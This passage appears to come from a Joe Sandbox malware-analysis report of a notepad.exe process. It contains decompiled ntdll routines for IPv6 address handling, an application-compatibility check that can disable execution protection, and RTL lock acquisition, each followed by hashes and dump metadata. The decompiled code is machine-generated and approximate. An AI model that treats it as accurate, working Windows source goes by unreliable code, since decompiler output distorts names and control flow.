                                                    								if(_t91 != _t116 && _t91 != _a8) {
                                                    									_push(":");
                                                    									_push(_t71 - _t128 >> 1);
                                                    									_push(_t128);
                                                    									_t128 = _t128 + E00B47707() * 2;
                                                    									_t71 = _v20;
                                                    									_t130 = _t130 + 0xc;
                                                    								}
                                                    								_t78 = E00B47707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
                                                    								_t130 = _t130 + 0x10;
                                                    							} else {
                                                    								_push(L"::");
                                                    								_push(_t71 - _t128 >> 1);
                                                    								_push(_t128);
                                                    								_t78 = E00B47707();
                                                    								_t130 = _t130 + 0xc;
                                                    								_t91 = _a8 - 1;
                                                    							}
                                                    							_t91 = _t91 + 1;
                                                    							_t128 = _t128 + _t78 * 2;
                                                    							_t71 = _v20;
                                                    							if(_t91 >= _v8) {
                                                    								goto L22;
                                                    							}
                                                    							_t116 = 0;
                                                    							goto L14;
                                                    						}
                                                    					} else {
                                                    						_t108 = 1;
                                                    						_v16 = _t129;
                                                    						_v24 = _t90;
                                                    						do {
                                                    							if( *_v16 == _t116) {
                                                    								if(_t108 - _v12 > _a8 - _a4) {
                                                    									_a4 = _v12;
                                                    									_a8 = _t108;
                                                    								}
                                                    								_t116 = 0;
                                                    							} else {
                                                    								_v12 = _t108;
                                                    							}
                                                    							_v16 = _v16 + 2;
                                                    							_t108 = _t108 + 1;
                                                    							_t26 =  &_v24;
                                                    							 *_t26 = _v24 - 1;
                                                    						} while ( *_t26 != 0);
                                                    						goto L11;
                                                    					}
                                                    				}
                                                    			}

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.1040434132.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: true
                                                    • Associated: 00000009.00000002.1040420400.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041429100.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041475672.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041557208.0000000000BF4000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041650076.0000000000BF7000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041688859.0000000000C00000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1042103449.0000000000C60000.00000040.00000800.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_af0000_notepad.jbxd
                                                    Similarity
                                                    • API ID: ___swprintf_l
                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                    • API String ID: 48624451-2108815105
                                                    • Opcode ID: 1a09e784e51b807208a5ee27869067ee04dcb9ada84f726442acb4efaffaa76f
                                                    • Instruction ID: 07af88dc8740aa7f452d28aeb9a5e4b002eb2ae6d96f3d5b8bf670833775d610
                                                    • Opcode Fuzzy Hash: 1a09e784e51b807208a5ee27869067ee04dcb9ada84f726442acb4efaffaa76f
                                                    • Instruction Fuzzy Hash: EA618871900685AACB24CF5DC890ABFBBF5EF94301B54C8EDF9EA47640D334AA44DB60
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 64%
                                                    			E00B47EFD(void* __ecx, intOrPtr _a4) {
                                                    				signed int _v8;
                                                    				char _v540;
                                                    				unsigned int _v544;
                                                    				signed int _v548;
                                                    				intOrPtr _v552;
                                                    				char _v556;
                                                    				void* __ebx;
                                                    				void* __edi;
                                                    				void* __esi;
                                                    				signed int _t33;
                                                    				void* _t38;
                                                    				unsigned int _t46;
                                                    				unsigned int _t47;
                                                    				unsigned int _t52;
                                                    				intOrPtr _t56;
                                                    				unsigned int _t62;
                                                    				void* _t69;
                                                    				void* _t70;
                                                    				intOrPtr _t72;
                                                    				signed int _t73;
                                                    				void* _t74;
                                                    				void* _t75;
                                                    				void* _t76;
                                                    				void* _t77;
                                                    
                                                    				_t33 =  *0xbf2088; // 0x74b3f05d
                                                    				_v8 = _t33 ^ _t73;
                                                    				_v548 = _v548 & 0x00000000;
                                                    				_t72 = _a4;
                                                    				if(L00B47F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
                                                    					__eflags = _v548;
                                                    					if(_v548 == 0) {
                                                    						goto L1;
                                                    					}
                                                    					_t62 = _t72 + 0x24;
                                                    					L00B63F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
                                                    					_t71 = 0x214;
                                                    					_v544 = 0x214;
                                                    					L00B1DFC0( &_v540, 0, 0x214);
                                                    					_t75 = _t74 + 0x20;
                                                    					_t46 =  *0xbf4218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
                                                    					__eflags = _t46;
                                                    					if(_t46 == 0) {
                                                    						goto L1;
                                                    					}
                                                    					_t47 = _v544;
                                                    					__eflags = _t47;
                                                    					if(_t47 == 0) {
                                                    						goto L1;
                                                    					}
                                                    					__eflags = _t47 - 0x214;
                                                    					if(_t47 >= 0x214) {
                                                    						goto L1;
                                                    					}
                                                    					_push(_t62);
                                                    					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
                                                    					L00B63F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
                                                    					_t52 = E00B20D27( &_v540, L"Execute=1");
                                                    					_t76 = _t75 + 0x1c;
                                                    					_push(_t62);
                                                    					__eflags = _t52;
                                                    					if(_t52 == 0) {
                                                    						L00B63F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
                                                    						_t71 =  &_v540;
                                                    						_t56 = _t73 + _v544 - 0x218;
                                                    						_t77 = _t76 + 0x14;
                                                    						_v552 = _t56;
                                                    						__eflags = _t71 - _t56;
                                                    						if(_t71 >= _t56) {
                                                    							goto L1;
                                                    						} else {
                                                    							goto L10;
                                                    						}
                                                    						while(1) {
                                                    							L10:
                                                    							_t62 = E00B28375(_t71, 0x20);
                                                    							_pop(_t69);
                                                    							__eflags = _t62;
                                                    							if(__eflags != 0) {
                                                    								__eflags = 0;
                                                    								 *_t62 = 0;
                                                    							}
                                                    							L00B63F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
                                                    							_t77 = _t77 + 0x10;
                                                    							E00B8E8DB(_t69, _t70, __eflags, _t72, _t71);
                                                    							__eflags = _t62;
                                                    							if(_t62 == 0) {
                                                    								goto L1;
                                                    							}
                                                    							_t31 = _t62 + 2; // 0x2
                                                    							_t71 = _t31;
                                                    							__eflags = _t71 - _v552;
                                                    							if(_t71 >= _v552) {
                                                    								goto L1;
                                                    							}
                                                    						}
                                                    					}
                                                    					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
                                                    					_push(3);
                                                    					_push(0x55);
                                                    					L00B63F92();
                                                    					_t38 = 1;
                                                    					L2:
                                                    					return E00B1E1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
                                                    				}
                                                    				L1:
                                                    				_t38 = 0;
                                                    				goto L2;
                                                    			}
                                                    Statement addresses (column detached from the listing above; 0x00000000 marks unresolved entries): 0x00b47f08-0x00b47f47, 0x00b63ead-0x00b63f86, 0x00b6e304-0x00b6e374

                                                    APIs
                                                    • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 00B63F12
                                                    Strings
                                                    • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 00B63F4A
                                                    • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 00B63EC4
                                                    • ExecuteOptions, xrefs: 00B63F04
                                                    • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 00B63F75
                                                    • CLIENT(ntdll): Processing section info %ws..., xrefs: 00B6E345
                                                    • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 00B6E2FB
                                                    • Execute=1, xrefs: 00B63F5E
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.1040434132.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: true
                                                    • Associated: 00000009.00000002.1040420400.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041429100.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041475672.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041557208.0000000000BF4000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041650076.0000000000BF7000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041688859.0000000000C00000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1042103449.0000000000C60000.00000040.00000800.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_af0000_notepad.jbxd
                                                    Similarity
                                                    • API ID: BaseDataModuleQuery
                                                    • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                    • API String ID: 3901378454-484625025
                                                    • Opcode ID: 5da1c281818ac6e92cd471f3906e37f023875b5217bd926b20def76e40f7dcc1
                                                    • Instruction ID: aa18365dd675f90894547f4f3974d601d30890a233f7117c266ecae993b5398d
                                                    • Opcode Fuzzy Hash: 5da1c281818ac6e92cd471f3906e37f023875b5217bd926b20def76e40f7dcc1
                                                    • Instruction Fuzzy Hash: 0741B572A8061C7BDB209B949CD6FEA73FCAF14700F4004E9F609A6191EB70DB85DB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			// Inferred from the constants in this listing: an IPv6 string-to-address parser.
                                                    			// 0x3a is ':', 0x2e is '.', groups are read in base 16 (at most 4 digits), a trailing
                                                    			// dotted-decimal IPv4 part in base 10 (at most 3 digits, <= 0xff), one "::" run is
                                                    			// allowed (its position kept in _v32), 8 groups are required, and malformed input
                                                    			// returns 0xc000000d (STATUS_INVALID_PARAMETER). _a12 receives the 16-byte address.
                                                    			E00B50B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
                                                    				signed int _v8;
                                                    				signed int _v12;
                                                    				signed int _v16;
                                                    				signed int _v20;
                                                    				signed int _v24;
                                                    				signed int _v28;
                                                    				signed int _v32;
                                                    				void* _t108;
                                                    				void* _t116;
                                                    				char _t120;
                                                    				short _t121;
                                                    				void* _t128;
                                                    				intOrPtr* _t130;
                                                    				char _t132;
                                                    				short _t133;
                                                    				intOrPtr _t141;
                                                    				signed int _t156;
                                                    				signed int _t174;
                                                    				intOrPtr _t177;
                                                    				intOrPtr* _t179;
                                                    				intOrPtr _t180;
                                                    				void* _t183;
                                                    
                                                    				_t179 = _a4;
                                                    				_t141 =  *_t179;
                                                    				_v16 = 0;
                                                    				_v28 = 0;
                                                    				_v8 = 0;
                                                    				_v24 = 0;
                                                    				_v12 = 0;
                                                    				_v32 = 0;
                                                    				_v20 = 0;
                                                    				if(_t141 == 0) {
                                                    					L41:
                                                    					 *_a8 = _t179;
                                                    					_t180 = _v24;
                                                    					if(_t180 != 0) {
                                                    						if(_t180 != 3) {
                                                    							goto L6;
                                                    						}
                                                    						_v8 = _v8 + 1;
                                                    					}
                                                    					_t174 = _v32;
                                                    					if(_t174 == 0) {
                                                    						if(_v8 == 7) {
                                                    							goto L43;
                                                    						}
                                                    						goto L6;
                                                    					}
                                                    					L43:
                                                    					if(_v16 != 1) {
                                                    						if(_v16 != 2) {
                                                    							goto L6;
                                                    						}
                                                    						 *((short*)(_a12 + _v20 * 2)) = 0;
                                                    						L47:
                                                    						if(_t174 != 0) {
                                                    							E00B28980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
                                                    							_t116 = 8;
                                                    							L00B1DFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
                                                    						}
                                                    						return 0;
                                                    					}
                                                    					if(_t180 != 0) {
                                                    						if(_v12 > 3) {
                                                    							goto L6;
                                                    						}
                                                    						_t120 = E00B50CFA(_v28, 0, 0xa);
                                                    						_t183 = _t183 + 0xc;
                                                    						if(_t120 > 0xff) {
                                                    							goto L6;
                                                    						}
                                                    						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
                                                    						goto L47;
                                                    					}
                                                    					if(_v12 > 4) {
                                                    						goto L6;
                                                    					}
                                                    					_t121 = E00B50CFA(_v28, _t180, 0x10);
                                                    					_t183 = _t183 + 0xc;
                                                    					 *((short*)(_a12 + _v20 * 2)) = _t121;
                                                    					goto L47;
                                                    				} else {
                                                    					while(1) {
                                                    						_t123 = _v16;
                                                    						if(_t123 == 0) {
                                                    							goto L7;
                                                    						}
                                                    						_t108 = _t123 - 1;
                                                    						if(_t108 != 0) {
                                                    							goto L1;
                                                    						}
                                                    						_t178 = _t141;
                                                    						if(E00B506BA(_t108, _t141) == 0 || _t135 == 0) {
                                                    							if(E00B506BA(_t135, _t178) == 0 || E00B50A5B(_t136, _t178) == 0) {
                                                    								if(_t141 != 0x3a) {
                                                    									if(_t141 == 0x2e) {
                                                    										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
                                                    											goto L41;
                                                    										} else {
                                                    											_v24 = _v24 + 1;
                                                    											L27:
                                                    											_v16 = _v16 & 0x00000000;
                                                    											L28:
                                                    											if(_v28 == 0) {
                                                    												goto L20;
                                                    											}
                                                    											_t177 = _v24;
                                                    											if(_t177 != 0) {
                                                    												if(_v12 > 3) {
                                                    													L6:
                                                    													return 0xc000000d;
                                                    												}
                                                    												_t132 = E00B50CFA(_v28, 0, 0xa);
                                                    												_t183 = _t183 + 0xc;
                                                    												if(_t132 > 0xff) {
                                                    													goto L6;
                                                    												}
                                                    												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
                                                    												goto L20;
                                                    											}
                                                    											if(_v12 > 4) {
                                                    												goto L6;
                                                    											}
                                                    											_t133 = E00B50CFA(_v28, 0, 0x10);
                                                    											_t183 = _t183 + 0xc;
                                                    											_v20 = _v20 + 1;
                                                    											 *((short*)(_a12 + _v20 * 2)) = _t133;
                                                    											goto L20;
                                                    										}
                                                    									}
                                                    									goto L41;
                                                    								}
                                                    								if(_v24 > 0 || _v8 > 6) {
                                                    									goto L41;
                                                    								} else {
                                                    									_t130 = _t179 + 1;
                                                    									if( *_t130 == _t141) {
                                                    										if(_v32 != 0) {
                                                    											goto L41;
                                                    										}
                                                    										_v32 = _v8 + 1;
                                                    										_t156 = 2;
                                                    										_v8 = _v8 + _t156;
                                                    										L34:
                                                    										_t179 = _t130;
                                                    										_v16 = _t156;
                                                    										goto L28;
                                                    									}
                                                    									_v8 = _v8 + 1;
                                                    									goto L27;
                                                    								}
                                                    							} else {
                                                    								_v12 = _v12 + 1;
                                                    								if(_v24 > 0) {
                                                    									goto L41;
                                                    								}
                                                    								_a7 = 1;
                                                    								goto L20;
                                                    							}
                                                    						} else {
                                                    							_v12 = _v12 + 1;
                                                    							L20:
                                                    							_t179 = _t179 + 1;
                                                    							_t141 =  *_t179;
                                                    							if(_t141 == 0) {
                                                    								goto L41;
                                                    							}
                                                    							continue;
                                                    						}
                                                    						L7:
                                                    						if(_t141 == 0x3a) {
                                                    							if(_v24 > 0 || _v8 > 0) {
                                                    								goto L41;
                                                    							} else {
                                                    								_t130 = _t179 + 1;
                                                    								if( *_t130 != _t141) {
                                                    									goto L41;
                                                    								}
                                                    								_v20 = _v20 + 1;
                                                    								_t156 = 2;
                                                    								_v32 = 1;
                                                    								_v8 = _t156;
                                                    								 *((short*)(_a12 + _v20 * 2)) = 0;
                                                    								goto L34;
                                                    							}
                                                    						}
                                                    						L8:
                                                    						if(_v8 > 7) {
                                                    							goto L41;
                                                    						}
                                                    						_t142 = _t141;
                                                    						if(E00B506BA(_t123, _t141) == 0 || _t124 == 0) {
                                                    							if(E00B506BA(_t124, _t142) == 0 || E00B50A5B(_t125, _t142) == 0 || _v24 > 0) {
                                                    								goto L41;
                                                    							} else {
                                                    								_t128 = 1;
                                                    								_a7 = 1;
                                                    								_v28 = _t179;
                                                    								_v16 = 1;
                                                    								_v12 = 1;
                                                    								L39:
                                                    								if(_v16 == _t128) {
                                                    									goto L20;
                                                    								}
                                                    								goto L28;
                                                    							}
                                                    						} else {
                                                    							_a7 = 0;
                                                    							_v28 = _t179;
                                                    							_v16 = 1;
                                                    							_v12 = 1;
                                                    							goto L20;
                                                    						}
                                                    					}
                                                    				}
                                                    				L1:
                                                    				_t123 = _t108 == 1;
                                                    				if(_t108 == 1) {
                                                    					goto L8;
                                                    				}
                                                    				_t128 = 1;
                                                    				goto L39;
                                                    			}

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.1040434132.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: true
• Associated: 00000009.00000002.1040420400.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp
• Associated: 00000009.00000002.1041429100.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp
• Associated: 00000009.00000002.1041475672.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp
• Associated: 00000009.00000002.1041557208.0000000000BF4000.00000040.00000800.00020000.00000000.sdmp
• Associated: 00000009.00000002.1041650076.0000000000BF7000.00000040.00000800.00020000.00000000.sdmp
• Associated: 00000009.00000002.1041688859.0000000000C00000.00000040.00000800.00020000.00000000.sdmp
• Associated: 00000009.00000002.1042103449.0000000000C60000.00000040.00000800.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_af0000_notepad.jbxd
                                                    Similarity
                                                    • API ID: __fassign
                                                    • String ID: .$:$:
                                                    • API String ID: 3965848254-2308638275
                                                    • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                    • Instruction ID: 6dd6311d5176e63da635aa74a2f28fb534ae00d51145349993261b93ffa87b30
                                                    • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                    • Instruction Fuzzy Hash: D3A18F7192030ADBDF24EF58C8857AEBBF4EF06306F2485EADC52A7241D7309A49CB51
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 50%
                                                    			E00B50554(signed int _a4, char _a8) {
                                                    				void* __ebx;
                                                    				void* __edi;
                                                    				void* __esi;
                                                    				signed int* _t49;
                                                    				signed int _t51;
                                                    				signed int _t56;
                                                    				signed int _t58;
                                                    				signed int _t61;
                                                    				signed int _t63;
                                                    				void* _t66;
                                                    				intOrPtr _t67;
                                                    				void* _t69;
                                                    				signed int _t70;
                                                    				void* _t75;
                                                    				signed int _t81;
                                                    				signed int _t84;
                                                    				void* _t86;
                                                    				signed int _t93;
                                                    				signed int _t96;
                                                    				intOrPtr _t105;
                                                    				signed int _t107;
                                                    				void* _t110;
                                                    				signed int _t115;
                                                    				signed int* _t119;
                                                    				void* _t125;
                                                    				void* _t126;
                                                    				signed int _t128;
                                                    				signed int _t130;
                                                    				signed int _t138;
                                                    				signed int _t144;
                                                    				void* _t158;
                                                    				void* _t159;
                                                    				void* _t160;
                                                    
                                                    				_t96 = _a4;
                                                    				_t115 =  *(_t96 + 0x28);
                                                    				_push(_t138);
                                                    				if(_t115 < 0) {
                                                    					_t105 =  *[fs:0x18];
                                                    					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
                                                    					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
                                                    						goto L6;
                                                    					} else {
                                                    						__eflags = _t115 | 0xffffffff;
                                                    						asm("lock xadd [eax], edx");
                                                    						return 1;
                                                    					}
                                                    				} else {
                                                    					L6:
                                                    					_push(_t128);
                                                    					while(1) {
                                                    						L7:
                                                    						__eflags = _t115;
                                                    						if(_t115 >= 0) {
                                                    							break;
                                                    						}
                                                    						__eflags = _a8;
                                                    						if(_a8 == 0) {
                                                    							__eflags = 0;
                                                    							return 0;
                                                    						} else {
                                                    							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
                                                    							_t49 = _t96 + 0x1c;
                                                    							_t106 = 1;
                                                    							asm("lock xadd [edx], ecx");
                                                    							_t115 =  *(_t96 + 0x28);
                                                    							__eflags = _t115;
                                                    							if(_t115 < 0) {
                                                    								L23:
                                                    								_t130 = 0;
                                                    								__eflags = 0;
                                                    								while(1) {
                                                    									_t118 =  *(_t96 + 0x30) & 0x00000001;
                                                    									asm("sbb esi, esi");
                                                    									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x00bf01c0;
                                                    									_push(_t144);
                                                    									_push(0);
                                                    									_t51 = E00B0F8CC( *((intOrPtr*)(_t96 + 0x18)));
                                                    									__eflags = _t51 - 0x102;
                                                    									if(_t51 != 0x102) {
                                                    										break;
                                                    									}
                                                    									_t106 =  *(_t144 + 4);
                                                    									_t126 =  *_t144;
                                                    									_t86 = L00B54FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
                                                    									_push(_t126);
                                                    									_push(_t86);
                                                    									L00B63F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
                                                    									L00B63F92(0x65, 0, "RTL: Resource at %p\n", _t96);
                                                    									_t130 = _t130 + 1;
                                                    									_t160 = _t158 + 0x28;
                                                    									__eflags = _t130 - 2;
                                                    									if(__eflags > 0) {
                                                    										E00B9217A(_t106, __eflags, _t96);
                                                    									}
                                                    									_push("RTL: Re-Waiting\n");
                                                    									_push(0);
                                                    									_push(0x65);
                                                    									L00B63F92();
                                                    									_t158 = _t160 + 0xc;
                                                    								}
                                                    								__eflags = _t51;
                                                    								if(__eflags < 0) {
                                                    									_push(_t51);
                                                    									E00B53915(_t96, _t106, _t118, _t130, _t144, __eflags);
                                                    									asm("int3");
                                                    									while(1) {
                                                    										L32:
                                                    										__eflags = _a8;
                                                    										if(_a8 == 0) {
                                                    											break;
                                                    										}
                                                    										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
                                                    										_t119 = _t96 + 0x24;
                                                    										_t107 = 1;
                                                    										asm("lock xadd [eax], ecx");
                                                    										_t56 =  *(_t96 + 0x28);
                                                    										_a4 = _t56;
                                                    										__eflags = _t56;
                                                    										if(_t56 != 0) {
                                                    											L40:
                                                    											_t128 = 0;
                                                    											__eflags = 0;
                                                    											while(1) {
                                                    												_t121 =  *(_t96 + 0x30) & 0x00000001;
                                                    												asm("sbb esi, esi");
                                                    												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x00bf01c0;
                                                    												_push(_t138);
                                                    												_push(0);
                                                    												_t58 = E00B0F8CC( *((intOrPtr*)(_t96 + 0x20)));
                                                    												__eflags = _t58 - 0x102;
                                                    												if(_t58 != 0x102) {
                                                    													break;
                                                    												}
                                                    												_t107 =  *(_t138 + 4);
                                                    												_t125 =  *_t138;
                                                    												_t75 = L00B54FC0(_t125, _t107, 0xff676980, 0xffffffff);
                                                    												_push(_t125);
                                                    												_push(_t75);
                                                    												L00B63F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
                                                    												L00B63F92(0x65, 0, "RTL: Resource at %p\n", _t96);
                                                    												_t128 = _t128 + 1;
                                                    												_t159 = _t158 + 0x28;
                                                    												__eflags = _t128 - 2;
                                                    												if(__eflags > 0) {
                                                    													E00B9217A(_t107, __eflags, _t96);
                                                    												}
                                                    												_push("RTL: Re-Waiting\n");
                                                    												_push(0);
                                                    												_push(0x65);
                                                    												L00B63F92();
                                                    												_t158 = _t159 + 0xc;
                                                    											}
                                                    											__eflags = _t58;
                                                    											if(__eflags < 0) {
                                                    												_push(_t58);
                                                    												E00B53915(_t96, _t107, _t121, _t128, _t138, __eflags);
                                                    												asm("int3");
                                                    												_t61 =  *_t107;
                                                    												 *_t107 = 0;
                                                    												__eflags = _t61;
                                                    												if(_t61 == 0) {
                                                    													L1:
                                                    													_t63 = E00B35384(_t138 + 0x24);
                                                    													if(_t63 != 0) {
                                                    														goto L52;
                                                    													} else {
                                                    														goto L2;
                                                    													}
                                                    												} else {
                                                    													_t123 =  *((intOrPtr*)(_t138 + 0x18));
                                                    													_push( &_a4);
                                                    													_push(_t61);
                                                    													_t70 = E00B0F970( *((intOrPtr*)(_t138 + 0x18)));
                                                    													__eflags = _t70;
                                                    													if(__eflags >= 0) {
                                                    														goto L1;
                                                    													} else {
                                                    														_push(_t70);
                                                    														E00B53915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
                                                    														L52:
                                                    														_t122 =  *((intOrPtr*)(_t138 + 0x20));
                                                    														_push( &_a4);
                                                    														_push(1);
                                                    														_t63 = E00B0F970( *((intOrPtr*)(_t138 + 0x20)));
                                                    														__eflags = _t63;
                                                    														if(__eflags >= 0) {
                                                    															L2:
                                                    															return _t63;
                                                    														} else {
                                                    															_push(_t63);
                                                    															E00B53915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
                                                    															_t109 =  *((intOrPtr*)(_t138 + 0x20));
                                                    															_push( &_a4);
                                                    															_push(1);
                                                    															_t63 = E00B0F970( *((intOrPtr*)(_t138 + 0x20)));
                                                    															__eflags = _t63;
                                                    															if(__eflags >= 0) {
                                                    																goto L2;
                                                    															} else {
                                                    																_push(_t63);
                                                    																_t66 = E00B53915(_t96, _t109, _t122, _t128, _t138, __eflags);
                                                    																asm("int3");
                                                    																while(1) {
                                                    																	_t110 = _t66;
                                                    																	__eflags = _t66 - 1;
                                                    																	if(_t66 != 1) {
                                                    																		break;
                                                    																	}
                                                    																	_t128 = _t128 | 0xffffffff;
                                                    																	_t66 = _t110;
                                                    																	asm("lock cmpxchg [ebx], edi");
                                                    																	__eflags = _t66 - _t110;
                                                    																	if(_t66 != _t110) {
                                                    																		continue;
                                                    																	} else {
                                                    																		_t67 =  *[fs:0x18];
                                                    																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
                                                    																		return _t67;
                                                    																	}
                                                    																	goto L59;
                                                    																}
                                                    																E00B35329(_t110, _t138);
                                                    																_t69 = E00B353A5(_t138, 1);
                                                    																return _t69;
                                                    															}
                                                    														}
                                                    													}
                                                    												}
                                                    											} else {
                                                    												_t56 =  *(_t96 + 0x28);
                                                    												goto L3;
                                                    											}
                                                    										} else {
                                                    											_t107 =  *_t119;
                                                    											__eflags = _t107;
                                                    											if(__eflags > 0) {
                                                    												while(1) {
                                                    													_t81 = _t107;
                                                    													asm("lock cmpxchg [edi], esi");
                                                    													__eflags = _t81 - _t107;
                                                    													if(_t81 == _t107) {
                                                    														break;
                                                    													}
                                                    													_t107 = _t81;
                                                    													__eflags = _t81;
                                                    													if(_t81 > 0) {
                                                    														continue;
                                                    													}
                                                    													break;
                                                    												}
                                                    												_t56 = _a4;
                                                    												__eflags = _t107;
                                                    											}
                                                    											if(__eflags != 0) {
                                                    												while(1) {
                                                    													L3:
                                                    													__eflags = _t56;
                                                    													if(_t56 != 0) {
                                                    														goto L32;
                                                    													}
                                                    													_t107 = _t107 | 0xffffffff;
                                                    													_t56 = 0;
                                                    													asm("lock cmpxchg [edx], ecx");
                                                    													__eflags = 0;
                                                    													if(0 != 0) {
                                                    														continue;
                                                    													} else {
                                                    														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                    														return 1;
                                                    													}
                                                    													goto L59;
                                                    												}
                                                    												continue;
                                                    											} else {
                                                    												goto L40;
                                                    											}
                                                    										}
                                                    										goto L59;
                                                    									}
                                                    									__eflags = 0;
                                                    									return 0;
                                                    								} else {
                                                    									_t115 =  *(_t96 + 0x28);
                                                    									continue;
                                                    								}
                                                    							} else {
                                                    								_t106 =  *_t49;
                                                    								__eflags = _t106;
                                                    								if(__eflags > 0) {
                                                    									while(1) {
                                                    										_t93 = _t106;
                                                    										asm("lock cmpxchg [edi], esi");
                                                    										__eflags = _t93 - _t106;
                                                    										if(_t93 == _t106) {
                                                    											break;
                                                    										}
                                                    										_t106 = _t93;
                                                    										__eflags = _t93;
                                                    										if(_t93 > 0) {
                                                    											continue;
                                                    										}
                                                    										break;
                                                    									}
                                                    									__eflags = _t106;
                                                    								}
                                                    								if(__eflags != 0) {
                                                    									continue;
                                                    								} else {
                                                    									goto L23;
                                                    								}
                                                    							}
                                                    						}
                                                    						goto L59;
                                                    					}
                                                    					_t84 = _t115;
                                                    					asm("lock cmpxchg [esi], ecx");
                                                    					__eflags = _t84 - _t115;
                                                    					if(_t84 != _t115) {
                                                    						_t115 = _t84;
                                                    						goto L7;
